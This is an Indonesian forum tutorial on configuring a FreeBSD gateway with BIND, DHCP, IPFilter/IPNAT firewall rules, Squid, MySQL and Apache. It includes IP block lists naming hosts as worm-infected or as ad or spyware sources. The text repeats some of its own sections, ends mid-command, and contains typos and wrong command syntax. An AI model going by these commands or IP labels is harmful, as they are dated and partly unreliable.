block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T03:55:52Z

Aa: /* File domain.rev: */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};
</pre>

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};
</pre>

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==
<pre>
forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};
</pre>

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254
</pre>

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254
</pre>

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4
[pre]
Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.
[/pre]

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:

#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"

2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:

su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3

semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

[pre]
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
[/pre]

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi

#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
